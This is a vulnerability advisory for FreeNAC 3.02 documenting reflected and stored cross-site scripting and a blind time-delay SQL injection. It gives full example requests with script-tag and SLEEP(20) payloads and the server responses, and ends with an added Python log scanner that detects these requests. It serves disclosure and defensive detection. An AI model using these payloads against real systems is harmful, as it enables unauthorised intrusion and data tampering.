FreeNAC version 3.02 SQL Injection and XSS Vulnerabilities

Date: May 19, 2012
Author: Blake
Software Link: http://sourceforge.net/project/showfiles.php?group_id=170004
Version: 3.02
Tested on: Ubuntu 8.04 (freenac version 3.02 vmware appliance)

FreeNAC
FreeNAC provides Virtual LAN assignment, LAN access control (for all kinds of network devices such as Servers, Workstations, Printers, IP-Phones ..), live network end-device discovery. Both 802.1x and Cisco's VMPS port security modes are supported. VLAN, switch port management and documentation of Patch cabling is also included.

==========================================================================================================================================

Reflective Cross-Site Scripting:

Multiple parameters are vulnerable to reflective cross-site scripting.

Affected Parameters:
comment
mac
graphtype
type
name

Example Request:

GET /stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
Host: 192.168.1.118
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://192.168.1.118/stats.php?graphtype=bar&type=switch
Cookie: freenac=92bcf3d911d94e33106c2e79745e8e8e

Example Response:

HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:42:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5676
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>FreeNAC :: Swisscom ::</title>
<link href="bw.css" rel="stylesheet" type="text/css" />
</head>
<a href='index.html' title='Main Menu'><img src='images/logo_small.png' border='0' /></a>
..........snip......................
<img src="statgraph.php?stattype=vlan13<script>alert(1)</script>&order=DESC&graphtype=bar"><br>
<br><p class='UpdateMsg'>Database error</p>
<p>Please go <a HREF='javascript:javascript:history.go(-1)'>back to the previous screen</a>, or the <a href='index.php' >Main Menu</a> and start again, or try again later.</p>

==========================================================================================================================================

Stored Cross-Site Scripting:

The comment parameter is vulnerable to stored cross-site scripting.

Example Request: <changed from a POST to a GET>

http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1

Example Response:

HTTP/1.1 200 OK
Date: Sat, 19 May 2012 17:53:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6945
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>FreeNAC :: Swisscom ::</title>
<link href="bw.css" rel="stylesheet" type="text/css" />
</head>
<a href='index.html' title='Main Menu'><img src='images/logo_small.png' border='0' /></a>
.............snip.................
</td></tr>
<tr><td>Switch:</td> <td>, port= , location=</td> <td><input type="submit" name="action" class="bluebox" value="Restart Port" /> </td> </tr>
<tr><td>Comment:</td><td> <input name="comment" type="text" size=40 value=""><script>alert(2)</script>"/> </td><td>Last IP:NONE<br></td>
<tr><td> </td><td></td></tr>
<tr><td> </td><td> <input type="submit" name="action" class="bluebox" value="Update" /> <input type="submit" name="action" class="bluebox" value="Delete" onClick="javascript:return confirm('Really DELETE this end-device record?')" /> </td></tr>'<tr><td> </td><td></td></tr>
<tr><td> </td><td></td></tr>
</table>
<table id='t3-2' width='760' border='0' class='text13'><tr><td> </td><td></td></tr>
<tr><td colspan=3 bgcolor="#DEDEDE"><b>Administrative information</b><tr><td>Inventory:<td>
<tr><td>Classification:
............snip....................

==========================================================================================================================================

SQL Injection:

The status parameter is vulnerable to blind SQL Injection.

Injecting a time-delay of 20 seconds:

http://192.168.1.118/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
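Added detection example, not part of the advisory: a Python scan over constructed Apache access-log lines that flags the three request shapes documented above (HTML metacharacters in the named XSS parameters of stats.php and deviceadd.php, and a non-numeric or time-delay value in the status parameter). The log lines are constructed, and the rule that status must be an integer is an assumption about FreeNAC's schema, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not real traffic); the query strings
# reproduce the three advisory requests plus one benign stats.php request.
SAMPLE_LOG = """\
192.168.1.50 - - [19/May/2012:17:42:41 +0000] "GET /stats.php?graphtype=bar&type=vlan13%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5676
192.168.1.50 - - [19/May/2012:17:53:38 +0000] "GET /deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment=%22%3E%3Cscript%3Ealert(2)%3C/script%3E&action=Update&action_idx=1 HTTP/1.1" 200 6945
192.168.1.50 - - [19/May/2012:17:55:02 +0000] "GET /deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1 HTTP/1.1" 200 6945
192.168.1.51 - - [19/May/2012:17:56:10 +0000] "GET /stats.php?graphtype=bar&type=switch HTTP/1.1" 200 5676
"""

# Parameters the advisory names as XSS sinks, and the one SQL injection parameter.
XSS_PARAMS = {"comment", "mac", "graphtype", "type", "name"}
INT_PARAMS = {"status"}  # assumption: status is a numeric column, so any non-digit value is suspect

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
HTML_META_RE = re.compile(r'[<>"\']')
SQL_DELAY_RE = re.compile(r'\b(SLEEP|BENCHMARK|WAITFOR)\b', re.IGNORECASE)

def inspect_line(line):
    """Return a list of (path, param, reason) findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if url.path not in ("/stats.php", "/deviceadd.php"):
        return []
    findings = []
    # parse_qs decodes %XX and '+'; keep_blank_values so an empty comment= is still visited
    for param, values in parse_qs(url.query, keep_blank_values=True).items():
        for value in values:
            if param in INT_PARAMS and not value.isdigit():
                findings.append((url.path, param, "non-integer value in SQL parameter"))
            if SQL_DELAY_RE.search(value):
                findings.append((url.path, param, "time-delay SQL keyword"))
            if param in XSS_PARAMS and HTML_META_RE.search(value):
                findings.append((url.path, param, "HTML metacharacters in reflected/stored parameter"))
    return findings

def scan_log(text):
    """Map 1-based line number -> findings, only for lines that produced any."""
    result = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = inspect_line(line)
        if hits:
            result[n] = hits
    return result

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG).items():
        for path, param, reason in hits:
            print(f"line {n}: {path} param={param}: {reason}")
```

Whitelisting by parameter and endpoint keeps the noise low; a generic `<script>` grep would miss the status payload, which contains no HTML at all.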